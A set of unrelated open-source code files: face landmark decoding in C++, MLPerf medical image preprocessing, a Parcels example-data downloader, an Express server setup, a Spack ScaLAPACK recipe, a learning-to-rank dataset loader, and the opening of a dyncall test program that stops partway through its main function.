      auto pose = PosePostPro(mxnet_outs[3]);
      output->push_back(pose);
    } else {
      // No pose head: emit an INVALID placeholder to keep slot alignment.
      auto pose = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
      pose->state_ = DataState::INVALID;
      output->push_back(std::static_pointer_cast<BaseData>(pose));
    }
  } else {
    // No model output at all: both slots get INVALID placeholders.
    auto landmarks = std::make_shared<XStreamData<hobot::vision::Landmarks>>();
    landmarks->state_ = DataState::INVALID;
    output->push_back(std::static_pointer_cast<BaseData>(landmarks));
    auto pose = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
    pose->state_ = DataState::INVALID;
    output->push_back(std::static_pointer_cast<BaseData>(pose));
  }
}
// Decodes the landmark heat-map head into 5 facial landmarks.
//   mxnet_outs[0]: per-cell landmark scores, NHWC 1x16x16x5
//   mxnet_outs[1]: per-cell coordinate regressions, NHWC 1x16x16x10
//   mxnet_outs[2]: (optional) directly regressed normalized coordinates,
//                  used as fallback when a landmark got no scoring cell.
// Each landmark is averaged over all cells whose score exceeds
// SCORE_THRESH, then mapped from model-input space (64 = 16 * STRIDE)
// into the given box. poi.score holds the number of contributing cells.
BaseDataPtr LmkPosePostPredictor::LmkPostPro(
    const std::vector<std::vector<int8_t>> &mxnet_outs,
    const hobot::vision::BBox &box,
    const std::vector<std::vector<uint32_t>> &nhwc) {
  static const float SCORE_THRESH = 0.0;
  static const float REGRESSION_RADIUS = 3.0;
  static const float STRIDE = 4.0;
  static const float num = 1;        // batch dimension of the head output
  static const float height_m = 16;  // heat-map height
  static const float width_m = 16;   // heat-map width
  auto fl_scores = reinterpret_cast<const float *>(mxnet_outs[0].data());
  auto fl_coords = reinterpret_cast<const float *>(mxnet_outs[1].data());
  std::vector<std::vector<float>> points_score;
  std::vector<std::vector<float>> points_x;
  std::vector<std::vector<float>> points_y;
  points_score.resize(5);
  points_x.resize(5);
  points_y.resize(5);
  // nhwc, 1x16x16x5, 1x16x16x10
  for (int n = 0; n < num; ++n) {        // n
    for (int i = 0; i < height_m; ++i) {   // h
      for (int j = 0; j < width_m; ++j) {  // w
        int index_score = n * nhwc[0][1] * nhwc[0][2] * nhwc[0][3] +
                          i * nhwc[0][2] * nhwc[0][3] + j * nhwc[0][3];
        // BUG FIX: the batch-stride term previously mixed tensors
        // (nhwc[1][1] * nhwc[1][2] * nhwc[0][3]). Harmless while num == 1
        // (it is multiplied by n == 0), but wrong for any larger batch.
        int index_coords = n * nhwc[1][1] * nhwc[1][2] * nhwc[1][3] +
                           i * nhwc[1][2] * nhwc[1][3] + j * nhwc[1][3];
        for (int k = 0; k < 5; ++k) {  // c
          auto score = fl_scores[index_score + k];
          if (score > SCORE_THRESH) {
            points_score[k].push_back(score);
            // Cell center minus the regressed offset, scaled to input space.
            float x = (j + 0.5 -
                       fl_coords[index_coords + 2 * k] * REGRESSION_RADIUS) *
                      STRIDE;
            float y =
                (i + 0.5 -
                 fl_coords[index_coords + 2 * k + 1] * REGRESSION_RADIUS) *
                STRIDE;
            // Clamp into the model input square [0, 64].
            x = std::min(std::max(x, 0.0f), width_m * STRIDE);
            y = std::min(std::max(y, 0.0f), height_m * STRIDE);
            points_x[k].push_back(x);
            points_y[k].push_back(y);
          }
        }
      }
    }
  }
  auto landmarks = std::make_shared<XStreamData<hobot::vision::Landmarks>>();
  landmarks->value.values.resize(5);
  for (int i = 0; i < 5; ++i) {
    auto &poi = landmarks->value.values[i];
    poi.x = Mean(points_x[i]);
    poi.y = Mean(points_y[i]);
    // Map from model input space (64 = width_m * STRIDE) into the box.
    poi.x = box.x1 + poi.x / 64 * (box.x2 - box.x1);
    poi.y = box.y1 + poi.y / 64 * (box.y2 - box.y1);
    // Score == number of contributing cells; ~0 means "no detection".
    poi.score = static_cast<float>(points_score[i].size());
    if (poi.score <= 0.000001 && mxnet_outs.size() > 2) {
      // Fall back to the directly regressed (normalized) coordinates.
      auto reg_coords = reinterpret_cast<const float *>(mxnet_outs[2].data());
      poi.x = box.x1 + reg_coords[i << 1] * (box.x2 - box.x1);
      poi.y = box.y1 + reg_coords[(i << 1) + 1] * (box.y2 - box.y1);
    }
  }
  return std::static_pointer_cast<BaseData>(landmarks);
}
// Converts the raw pose head output into a Pose3D result.
// The head emits three floats in yaw/pitch/roll order; the factor below
// rescales them to degrees (presumably the model normalizes by 90 --
// TODO confirm against the training code).
BaseDataPtr LmkPosePostPredictor::PosePostPro(
    const std::vector<int8_t> &mxnet_outs) {
  static const double kDegreesScale = 90.0;
  const float *angles = reinterpret_cast<const float *>(mxnet_outs.data());
  auto pose = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
  pose->value.yaw = angles[0] * kDegreesScale;
  pose->value.pitch = angles[1] * kDegreesScale;
  pose->value.roll = angles[2] * kDegreesScale;
  return std::static_pointer_cast<BaseData>(pose);
}
} // namespace xstream
|
# coding=utf-8
# Copyright (c) 2020 NVIDIA CORPORATION. All rights reserved.
# Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file has been copied from
# https://github.com/mlcommons/inference/blob/r0.7/vision/medical_imaging/3d-unet/preprocess.py
import argparse
import numpy
import os
import pickle
import sys
import torch
from batchgenerators.augmentations.utils import pad_nd_image
from batchgenerators.utilities.file_and_folder_operations import subfiles
from nnunet.training.model_restore import load_model_and_checkpoint_files
from nnunet.inference.predict import preprocess_multithreaded
def preprocess_MLPerf(model, checkpoint_name, folds, fp16, list_of_lists, output_filenames, preprocessing_folder, num_threads_preprocessing):
    """Run nnU-Net preprocessing for the given cases and pickle the results.

    Args:
        model: path to the trained model directory.
        checkpoint_name: checkpoint file stem to load.
        folds: fold id(s) to load parameters for.
        fp16: whether to load the model in half precision.
        list_of_lists: per-case lists of input image paths.
        output_filenames: one output name per case (same length as list_of_lists).
        preprocessing_folder: directory receiving the "<case>.pkl" files.
        num_threads_preprocessing: worker threads for the preprocessing generator.

    Returns:
        List of the case output names, in the order they were processed.
    """
    assert len(list_of_lists) == len(output_filenames)
    print("loading parameters for folds", folds)
    trainer, params = load_model_and_checkpoint_files(model, folds, fp16, checkpoint_name=checkpoint_name)
    print("starting preprocessing generator")
    preprocessing = preprocess_multithreaded(trainer, list_of_lists, output_filenames, num_threads_preprocessing, None)
    print("Preprocessing images...")
    all_output_files = []
    for preprocessed in preprocessing:
        output_filename, (d, dct) = preprocessed
        all_output_files.append(output_filename)
        if isinstance(d, str):
            # The generator may spill large volumes to disk and return a file
            # path instead of an array; load it and remove the temp file.
            # BUG FIX: this module does `import numpy` (not `as np`), so the
            # original `np.load(d)` raised NameError whenever this branch ran.
            data = numpy.load(d)
            os.remove(d)
            d = data
        # Pad to the desired full volume
        d = pad_nd_image(d, trainer.patch_size, "constant", None, False, None)
        # (A redundant f.close() inside the with-block was removed; the
        # context manager already closes the file.)
        with open(os.path.join(preprocessing_folder, output_filename + ".pkl"), "wb") as f:
            pickle.dump([d, dct], f)
    return all_output_files
def preprocess_setup(preprocessed_data_dir):
    """Prepare and preprocess the BraTS2019 fold-1 validation set.

    Reads the validation case list, locates the trained nnU-Net model,
    preprocesses every case via :func:`preprocess_MLPerf`, and stores the
    resulting file list as ``preprocessed_files.pkl`` in
    ``preprocessed_data_dir`` (created if missing).
    """
    print("Preparing for preprocessing data...")
    # Validation set is fold 1
    fold = 1
    validation_fold_file = '../models/image_segmentation/tensorflow/3d_unet_mlperf/inference/nnUNet/folds/fold1_validation.txt'
    # Make sure the model exists
    model_dir = 'build/result/nnUNet/3d_fullres/Task043_BraTS2019/nnUNetTrainerV2__nnUNetPlansv2.mlperf.1'
    model_path = os.path.join(model_dir, "plans.pkl")
    assert os.path.isfile(model_path), "Cannot find the model file {:}!".format(model_path)
    checkpoint_name = "model_final_checkpoint"
    # Other settings
    fp16 = False
    num_threads_preprocessing = 12
    raw_data_dir = 'build/raw_data/nnUNet_raw_data/Task043_BraTS2019/imagesTr'
    # Open list containing validation images from specific fold (e.g. 1)
    validation_files = []
    with open(validation_fold_file) as f:
        for line in f:
            validation_files.append(line.rstrip())
    # Create output and preprocessed directory
    if not os.path.isdir(preprocessed_data_dir):
        os.makedirs(preprocessed_data_dir)
    # Create list of images locations (i.e. 4 images per case => 4 modalities)
    all_files = subfiles(raw_data_dir, suffix=".nii.gz", join=False, sort=True)
    # Idiom fix: `i[:len(j)].startswith(j)` is equivalent to `i.startswith(j)`.
    # The length check keeps only files named "<case>" + 12 extra chars
    # (modality suffix + ".nii.gz").
    list_of_lists = [[os.path.join(raw_data_dir, i) for i in all_files
                      if i.startswith(j) and len(i) == (len(j) + 12)]
                     for j in validation_files]
    # Preprocess images, returns filenames list
    # This runs in multiprocess
    print("Acually preprocessing data...")
    preprocessed_files = preprocess_MLPerf(model_dir, checkpoint_name, fold, fp16, list_of_lists,
                                           validation_files, preprocessed_data_dir, num_threads_preprocessing)
    print("Saving metadata of the preprocessed data...")
    with open(os.path.join(preprocessed_data_dir, "preprocessed_files.pkl"), "wb") as f:
        pickle.dump(preprocessed_files, f)
    print("Preprocessed data saved to {:}".format(preprocessed_data_dir))
    print("Done!")
|
"""Get example scripts, notebooks, and data files."""
import argparse
from datetime import datetime, timedelta
from glob import glob
import json
import os
import pkg_resources
from progressbar import ProgressBar
try:
# For Python 3.0 and later
from urllib.request import urlopen
except ImportError:
# Fall back to Python 2's urllib2
from urllib2 import urlopen
import shutil
import sys
# Relative paths (under the remote data root below) of every example data
# file; each sub-list corresponds to one dataset directory on the server.
example_data_files = (
    ["MovingEddies_data/" + fn for fn in [
        "moving_eddiesP.nc", "moving_eddiesU.nc", "moving_eddiesV.nc"]]
    + ["OFAM_example_data/" + fn for fn in [
        "OFAM_simple_U.nc", "OFAM_simple_V.nc"]]
    + ["Peninsula_data/" + fn for fn in [
        "peninsulaU.nc", "peninsulaV.nc", "peninsulaP.nc"]]
    + ["GlobCurrent_example_data/" + fn for fn in [
        "%s000000-GLOBCURRENT-L4-CUReul_hs-ALT_SUM-v02.0-fv01.0.nc" % (
            date.strftime("%Y%m%d"))
        # One file per day for all of 2002, plus 2003-01-01.
        for date in ([datetime(2002, 1, 1) + timedelta(days=x)
                      for x in range(0, 365)] + [datetime(2003, 1, 1)])]]
    + ["DecayingMovingEddy_data/" + fn for fn in [
        "decaying_moving_eddyU.nc", "decaying_moving_eddyV.nc"]]
    + ["NemoCurvilinear_data/" + fn for fn in [
        "U_purely_zonal-ORCA025_grid_U.nc4", "V_purely_zonal-ORCA025_grid_V.nc4",
        "mesh_mask.nc4"]]
    + ["NemoNorthSeaORCA025-N006_data/" + fn for fn in [
        "ORCA025-N06_20000104d05U.nc", "ORCA025-N06_20000109d05U.nc",
        "ORCA025-N06_20000104d05V.nc", "ORCA025-N06_20000109d05V.nc",
        "ORCA025-N06_20000104d05W.nc", "ORCA025-N06_20000109d05W.nc",
        "coordinates.nc"]])
# Remote root from which any data files missing locally are downloaded.
example_data_url = "http://oceanparcels.org/examples-data"
def _maybe_create_dir(path):
"""Create directory (and parents) if they don't exist."""
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
def copy_data_and_examples_from_package_to(target_path):
    """Copy the bundled Parcels ``examples`` directory to ``target_path``.

    Failures (e.g. the target already exists, or the package carries no
    examples) are printed but deliberately not fatal -- missing data files
    are fetched from the website later.
    """
    source = pkg_resources.resource_filename("parcels", "examples")
    try:
        shutil.copytree(source, target_path)
    except Exception as err:
        # Best effort only: report and continue.
        print(err)
def set_jupyter_kernel_to_python_version(path, python_version=2):
    """Rewrite every ``*.ipynb`` directly under ``path`` so its kernelspec
    targets the given Python major version.

    All other notebook metadata is intentionally discarded.
    """
    kernelspec = {
        "display_name": "Python {}".format(python_version),
        "language": "python",
        "name": "python{}".format(python_version),
    }
    for file_name in glob(os.path.join(path, "*.ipynb")):
        with open(file_name, 'r') as f:
            notebook_data = json.load(f)
        # Replace the whole metadata dict, keeping only the kernelspec.
        notebook_data['metadata'] = {"kernelspec": dict(kernelspec)}
        with open(file_name, 'w') as f:
            json.dump(notebook_data, f, indent=2)
def _still_to_download(file_names, target_path):
"""Only return the files that are not yet present on disk."""
for fn in list(file_names):
if os.path.exists(os.path.join(target_path, fn)):
file_names.remove(fn)
return file_names
def download_files(source_url, file_names, target_path):
    """Mirror file_names from source_url to target_path.

    Creates any needed subdirectories and skips files that already exist
    locally. Shows a progress bar while downloading. Each file is read
    fully into memory before being written, so this is intended for the
    modestly sized example files.
    """
    _maybe_create_dir(target_path)
    pbar = ProgressBar()
    print("Downloading %s ..." % (source_url.split("/")[-1]))
    for filename in pbar(file_names):
        # Mirror the remote directory layout locally.
        _maybe_create_dir(os.path.join(target_path, os.path.dirname(filename)))
        if not os.path.exists(os.path.join(target_path, filename)):
            download_url = source_url + "/" + filename
            src = urlopen(download_url)
            with open(os.path.join(target_path, filename), 'wb') as dst:
                dst.write(src.read())
def main(target_path=None):
    """Get example scripts, example notebooks, and example data.
    Copy the examples from the package directory and get the example data either
    from the package directory or from the Parcels website.
    """
    if target_path is None:
        # get target directory from the command line when not passed in
        parser = argparse.ArgumentParser(
            description="Get Parcels example data.")
        parser.add_argument(
            "target_path",
            help="Where to put the tutorials? (This path will be created.)")
        args = parser.parse_args()
        target_path = args.target_path
    # Refuse to overwrite an existing directory.
    if os.path.exists(target_path):
        print("Error: {} already exists.".format(target_path))
        return
    # copy data and examples
    copy_data_and_examples_from_package_to(target_path)
    # make sure the notebooks use the correct python version
    set_jupyter_kernel_to_python_version(
        target_path,
        python_version=sys.version_info[0])
    # try downloading remaining files
    # NOTE: _still_to_download mutates the module-level example_data_files
    # list in place; harmless for a single main() invocation.
    remaining_example_data_files = _still_to_download(
        example_data_files, target_path)
    download_files(example_data_url, remaining_example_data_files, target_path)
# Allow running this module directly as a script.
if __name__ == "__main__":
    main()
|
const express = require('express');
const cors = require('cors');
const bodyParser = require('body-parser');
const session = require('express-session');
const MYSQLStore = require('express-session-sequelize')(session.Store);
const next = require('next');
const compression = require('compression');
const helmet = require('helmet');
// const Sequelize = require('sequelize');
const logger = require('./logger');
const { insertTemplates } = require('./models/EmailTemplate');
const getRootUrl = require('../lib/api/getRootUrl');
// const User = require('./models/User');
const { initMigrateData } = require('./models/Group');
const { newMysqlInstance } = require('./utils/utils');
const setupGoogle = require('./google');
const fileSystem = require('./filesystem');
const api = require('./api');
require('dotenv').config();
// True outside production builds; controls Next.js dev mode and cookie policy.
const dev = process.env.NODE_ENV !== 'production';
// const MONGO_URL = process.env.MONGO_URL_TEST;
// const options = {
//   useNewUrlParser: true,
//   useCreateIndex: true,
//   useFindAndModify: false,
//   useUnifiedTopology: true,
// };
const port = process.env.PORT || 8000;
const ROOT_URL = getRootUrl();
// Paths that render a specific Next.js page instead of the default handler.
const URL_MAP = {
  '/login': '/public/login',
  '/contact': '/public/contact',
};
const app = next({ dev });
const handle = app.getRequestHandler();
// Sequelize instance backing the session store (see utils/newMysqlInstance).
const myDatabase = newMysqlInstance();
// const myDatabase = new Sequelize(process.env.MYSQL_DATABASE, process.env.MYSQL_USER, process.env.MYSQL_PASSWORD, {
//   host: process.env.MYSQL_SERVER,
//   dialect: 'mysql',
// });
// Nextjs's server prepared
// Boot the Express server once the Next.js app is prepared:
// security/compression middleware, optional group-data migration,
// MySQL-backed sessions, body parsing, feature routers, then listen.
app.prepare().then(async () => {
  // await tf.setBackend('cpu');
  const server = express();
  server.use(helmet({ contentSecurityPolicy: false }));
  server.use(compression());
  // One-off data migration, enabled via env flag.
  if (process.env.REQUIRE_INIT_GROUP === 'true') {
    console.log('Starting initiate Group Data');
    try {
      await initMigrateData();
      console.log('Initiate Group Data Done.');
    } catch (err) {
      console.error('Init Group error:', err);
    }
  }
  // configuring mysql session store
  const sess = {
    name: process.env.SESSION_NAME,
    secret: process.env.SESSION_SECRET,
    store: new MYSQLStore({ db: myDatabase }),
    resave: false,
    saveUninitialized: false,
    cookie: {
      httpOnly: true,
      maxAge: 14 * 24 * 60 * 60 * 1000, // two weeks
      domain: process.env.COOKIE_DOMAIN,
    },
  };
  if (!dev) {
    server.set('trust proxy', 1); // sets req.hostname, req.ip
    // BUG FIX: this was `false`, contradicting the comment and sending the
    // session cookie over plain HTTP in production. With 'trust proxy' set,
    // express-session honours X-Forwarded-Proto when deciding to set it.
    sess.cookie.secure = true; // sets cookie over HTTPS only
  }
  server.use(session(sess));
  await insertTemplates();
  server.use(cors());
  server.use(bodyParser.urlencoded({ extended: true, parameterLimit: 100000, limit: '50mb' }));
  server.use(bodyParser.json({ limit: '50mb' }));
  // server.get('/', async (req, res) => {
  //   // await User.create({
  //   //   department: 'AI Research',
  //   //   displayName: 'Jia Wang',
  //   //   email: '[email protected]',
  //   //   googleId: process.env.GOOGLE_CLIENTID,
  //   //   avatarUrl:
  //   //     'https://lh3.googleusercontent.com/-XdUIqdMkCWA/AAAAAAAAAAI/AAAAAAAAAAA/4252rscbv5M/photo.jpg?sz=128',
  //   // });
  //   const user = await User.findOne({ department: 'AI Research' });
  //   req.user = user;
  //   app.render(req, res, '/');
  // });
  setupGoogle({ server, ROOT_URL });
  fileSystem({ server });
  api(server);
  // server.get('*', (req, res) => handle(req, res));
  // Mapped paths render a dedicated page; everything else goes to Next.js.
  server.get('*', (req, res) => {
    const url = URL_MAP[req.path];
    if (url) {
      app.render(req, res, url);
    } else {
      handle(req, res);
    }
  });
  // starting express server
  server.listen(port, (err) => {
    if (err) throw err;
    logger.info(`> Ready on ${ROOT_URL}`); // eslint-disable-line no-console
  });
});
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import sys
from spack import *
class ScalapackBase(CMakePackage):
    """Base class for building ScaLAPACK, shared with the AMD optimized version
    of the library in the 'amdscalapack' package.
    """

    variant(
        'build_type',
        default='Release',
        description='CMake build type',
        values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
    variant(
        'shared',
        default=True,
        description='Build the shared library version'
    )
    variant(
        'pic',
        default=False,
        description='Build position independent code'
    )

    provides('scalapack')

    depends_on('mpi')
    depends_on('lapack')
    depends_on('blas')
    depends_on('cmake', when='@2.0.0:', type='build')

    # See: https://github.com/Reference-ScaLAPACK/scalapack/issues/9
    patch("cmake_fortran_mangle.patch", when='@2.0.2:2.0')
    # See: https://github.com/Reference-ScaLAPACK/scalapack/pull/10
    patch("mpi2-compatibility.patch", when='@2.0.2:2.0')
    # See: https://github.com/Reference-ScaLAPACK/scalapack/pull/16
    patch("int_overflow.patch", when='@2.0.0:2.1.0')
    # See: https://github.com/Reference-ScaLAPACK/scalapack/pull/23
    patch("gcc10-compatibility.patch", when='@2.0.0:2.1.0')

    @property
    def libs(self):
        """Locate the installed ScaLAPACK library for dependents.

        Note that the default would be to search for
        'libnetlib-scalapack.<suffix>', hence the explicit name here.
        """
        # Idiom fix: the membership test is already a bool; the former
        # `True if ... else False` was redundant.
        shared = '+shared' in self.spec
        return find_libraries(
            'libscalapack', root=self.prefix, shared=shared, recursive=True
        )

    def cmake_args(self):
        """Assemble the CMake configure arguments for this spec."""
        spec = self.spec

        options = [
            "-DBUILD_SHARED_LIBS:BOOL=%s" % ('ON' if '+shared' in spec else
                                             'OFF'),
            "-DBUILD_STATIC_LIBS:BOOL=%s" % ('OFF' if '+shared' in spec else
                                             'ON')
        ]

        # Make sure we use Spack's Lapack:
        blas = spec['blas'].libs
        lapack = spec['lapack'].libs
        options.extend([
            '-DLAPACK_FOUND=true',
            '-DLAPACK_INCLUDE_DIRS=%s' % spec['lapack'].prefix.include,
            '-DLAPACK_LIBRARIES=%s' % (lapack.joined(';')),
            '-DBLAS_LIBRARIES=%s' % (blas.joined(';'))
        ])

        c_flags = []
        if '+pic' in spec:
            c_flags.append(self.compiler.cc_pic_flag)
            options.append(
                "-DCMAKE_Fortran_FLAGS=%s" % self.compiler.fc_pic_flag
            )

        # Work around errors of the form:
        # error: implicit declaration of function 'BI_smvcopy' is
        # invalid in C99 [-Werror,-Wimplicit-function-declaration]
        if spec.satisfies('%clang') or spec.satisfies('%apple-clang'):
            c_flags.append('-Wno-error=implicit-function-declaration')

        options.append(
            self.define('CMAKE_C_FLAGS', ' '.join(c_flags))
        )

        return options

    @run_after('install')
    def fix_darwin_install(self):
        """Repair install names of shared libraries on macOS."""
        # The shared libraries are not installed correctly on Darwin:
        if (sys.platform == 'darwin') and ('+shared' in self.spec):
            fix_darwin_install_name(self.spec.prefix.lib)
class NetlibScalapack(ScalapackBase):
    """ScaLAPACK is a library of high-performance linear algebra routines for
    parallel distributed memory machines
    """
    homepage = "https://www.netlib.org/scalapack/"
    url = "https://www.netlib.org/scalapack/scalapack-2.0.2.tgz"
    # Member of the Extreme-scale Scientific Software Stack (E4S) collection.
    tags = ['e4s']
    # Release tarballs from netlib, pinned by sha256.
    version('2.1.0', sha256='61d9216cf81d246944720cfce96255878a3f85dec13b9351f1fa0fd6768220a6')
    version('2.0.2', sha256='0c74aeae690fe5ee4db7926f49c5d0bb69ce09eea75beb915e00bba07530395c')
    version('2.0.1', sha256='a9b34278d4e10b40cbe084c6d87d09af8845e874250719bfbbc497b2a88bfde1')
    version('2.0.0', sha256='e51fbd9c3ef3a0dbd81385b868e2355900148eea689bf915c5383d72daf73114')
    # versions before 2.0.0 are not using cmake and requires blacs as
    # a separated package
    # All build logic is inherited from ScalapackBase above.
|
import os
from typing import Optional
from pytorchltr.utils.downloader import DefaultDownloadProgress
from pytorchltr.utils.downloader import Downloader
from pytorchltr.utils.file import validate_and_download
from pytorchltr.utils.file import extract_zip
from pytorchltr.utils.file import dataset_dir
from pytorchltr.datasets.svmrank.svmrank import SVMRankDataset
class MSLR10K(SVMRankDataset):
    """
    Utility class for downloading and using the MSLR-WEB10K dataset:
    https://www.microsoft.com/en-us/research/project/mslr/.
    This dataset is a smaller sampled version of the MSLR-WEB30K dataset.
    """

    # Downloads and unpacks the official distribution zip.
    downloader = Downloader(
        url="https://api.onedrive.com/v1.0/shares/s!AtsMfWUz5l8nbOIoJ6Ks0bEMp78/root/content",  # noqa: E501
        target="MSLR-WEB10K.zip",
        sha256_checksum="2902142ea33f18c59414f654212de5063033b707d5c3939556124b1120d3a0ba",  # noqa: E501
        progress_fn=DefaultDownloadProgress(),
        postprocess_fn=extract_zip)

    # Expected files (with checksums) per cross-validation fold.
    per_fold_expected_files = {
        1: [
            {"path": "Fold1/train.txt", "sha256": "6eb3fae4e1186e1242a6520f53a98abdbcde5b926dd19a28e51239284b1d55dc"},  # noqa: E501
            {"path": "Fold1/test.txt", "sha256": "33fe002374a4fce58c4e12863e4eee74745d5672a26f3e4ddacc20ccfe7d6ba0"},  # noqa: E501
            {"path": "Fold1/vali.txt", "sha256": "e86fb3fe7e8a5f16479da7ce04f783ae85735f17f66016786c3ffc797dd9d4db"}  # noqa: E501
        ],
        2: [
            {"path": "Fold2/train.txt", "sha256": "40e4a2fcc237d9c164cbb6a3f2fa91fe6cf7d46a419d2f73e21cf090285659eb"},  # noqa: E501
            {"path": "Fold2/test.txt", "sha256": "44add582ccd674cf63af24d3bf6e1074e87a678db77f00b44c37980a3010917a"},  # noqa: E501
            {"path": "Fold2/vali.txt", "sha256": "33fe002374a4fce58c4e12863e4eee74745d5672a26f3e4ddacc20ccfe7d6ba0"}  # noqa: E501
        ],
        3: [
            {"path": "Fold3/train.txt", "sha256": "f13005ceb8de0db76c93b02ee4b2bded6f925097d3ab7938931e8d07aa72acd7"},  # noqa: E501
            {"path": "Fold3/test.txt", "sha256": "c0a5a3c6bd7790d0b4ff3d5e961d0c8c5f8ff149089ce492540fa63035801b7a"},  # noqa: E501
            {"path": "Fold3/vali.txt", "sha256": "44add582ccd674cf63af24d3bf6e1074e87a678db77f00b44c37980a3010917a"}  # noqa: E501
        ],
        4: [
            {"path": "Fold4/train.txt", "sha256": "6c1677cf9b2ed491e26ac6b8c8ca7dfae9c1a375e2bce8cba6df36ab67ce5836"},  # noqa: E501
            {"path": "Fold4/test.txt", "sha256": "dc6083c24a5f0c03df3c91ad3eed7542694115b998acf046e51432cb7a22b848"},  # noqa: E501
            {"path": "Fold4/vali.txt", "sha256": "c0a5a3c6bd7790d0b4ff3d5e961d0c8c5f8ff149089ce492540fa63035801b7a"}  # noqa: E501
        ],
        5: [
            {"path": "Fold5/train.txt", "sha256": "4249797a2f0f46bff279973f0fb055d4a78f67f337769eabd56e82332c044794"},  # noqa: E501
            {"path": "Fold5/test.txt", "sha256": "e86fb3fe7e8a5f16479da7ce04f783ae85735f17f66016786c3ffc797dd9d4db"},  # noqa: E501
            {"path": "Fold5/vali.txt", "sha256": "dc6083c24a5f0c03df3c91ad3eed7542694115b998acf046e51432cb7a22b848"}  # noqa: E501
        ]
    }

    # Maps a split name to the file holding it inside each fold directory.
    splits = {
        "train": "train.txt",
        "test": "test.txt",
        "vali": "vali.txt"
    }

    def __init__(self, location: Optional[str] = None,
                 split: str = "train", fold: int = 1, normalize: bool = True,
                 filter_queries: Optional[bool] = None, download: bool = True,
                 validate_checksums: bool = True):
        """
        Args:
            location: Directory where the dataset is located. Defaults to
                ``dataset_dir("MSLR10K")``.
            split: The data split to load ("train", "test" or "vali")
            fold: Which data fold to load (1...5)
            normalize: Whether to perform query-level feature
                normalization.
            filter_queries: Whether to filter out queries that
                have no relevant items. If not given this will filter queries
                for the test set but not the train set.
            download: Whether to download the dataset if it does not
                exist.
            validate_checksums: Whether to validate the dataset files
                via sha256.
        """
        # Resolve the default location lazily: the original default argument
        # called dataset_dir() at import time, freezing the path before any
        # environment changes could take effect.
        if location is None:
            location = dataset_dir("MSLR10K")

        # Check if specified split and fold exists.
        if split not in MSLR10K.splits.keys():
            raise ValueError("unrecognized data split '%s'" % str(split))

        if fold not in MSLR10K.per_fold_expected_files.keys():
            raise ValueError("unrecognized data fold '%s'" % str(fold))

        # Validate dataset exists and is correct, or download it.
        validate_and_download(
            location=location,
            expected_files=MSLR10K.per_fold_expected_files[fold],
            downloader=MSLR10K.downloader if download else None,
            validate_checksums=validate_checksums)

        # Only filter queries on non-train splits (unless explicitly set).
        if filter_queries is None:
            filter_queries = split != "train"

        # Initialize the dataset.
        datafile = os.path.join(location, "Fold%d" % fold,
                                MSLR10K.splits[split])
        super().__init__(file=datafile, sparse=False, normalize=normalize,
                         filter_queries=filter_queries, zero_based="auto")
|
/*
Package: dyncall
Library: test
File: test/callf/main.c
Description:
License:
Copyright (c) 2007-2021 Daniel Adler <[email protected]>,
Tassilo Philipp <[email protected]>
Permission to use, copy, modify, and distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/
/* test dcCallF API */
#include "../../dyncall/dyncall_callf.h"
#include "../common/platformInit.h"
#include "../common/platformInit.c" /* Impl. for functions only used in this translation unit */
#include <stdarg.h>
#if defined(DC_UNIX) && !defined(DC__OS_BeOS)
#include <sys/syscall.h>
#endif
/* sample void function */
/* Sample target function taking three ints; returns 1 iff it received
   exactly (1, 2, 3), and echoes its arguments plus the verdict. */
int vf_iii(int x,int y,int z)
{
  int ok = (x == 1) && (y == 2) && (z == 3);
  printf("%d %d %d: %d", x, y, z, ok);
  return ok;
}
/* Sample target function mixing float and int parameters; returns 1 iff
   the arguments are exactly (1,2,3,4,5,6,7,8,9) in their declared types. */
int vf_ffiffiffi(float a, float b, int c, float d, float e, int f, float g, float h, int i)
{
  int ok = a == 1.f && b == 2.f && c == 3
        && d == 4.f && e == 5.f && f == 6
        && g == 7.f && h == 8.f && i == 9;
  printf("%f %f %d %f %f %d %f %f %d: %d", a, b, c, d, e, f, g, h, i, ok);
  return ok;
}
/* Variadic sample target: fixed (float, float, int) head followed by the
   varargs (double, double, int, double, double, int).  Floats in the
   variadic part arrive promoted to double.  Returns 1 iff the nine values
   are exactly 1..9. */
int vf_ffiV(float a, float b, int c, ...)
{
  double d, e, g, h;
  int f, i, ok;
  va_list args;

  va_start(args, c);
  d = va_arg(args, double);
  e = va_arg(args, double);
  f = va_arg(args, int);
  g = va_arg(args, double);
  h = va_arg(args, double);
  i = va_arg(args, int);
  va_end(args);

  ok = a == 1.f && b == 2.f && c == 3 && d == 4. && e == 5. && f == 6 && g == 7. && h == 8. && i == 9;
  printf("%f %f %d %f %f %d %f %f %d: %d", a, b, c, d, e, f, g, h, i, ok);
  return ok;
}
/* main: exercises the dcCallF/dcArgF 'formatted call' API of dyncall.
   Each sub-test prints its arguments and verdict; r accumulates overall
   success (stays 1 only if every sub-test succeeded). */
int main(int argc, char* argv[])
{
  DCCallVM* vm;
  DCValue ret;
  int r = 1;
  dcTest_initPlatform();
  /* allocate call vm */
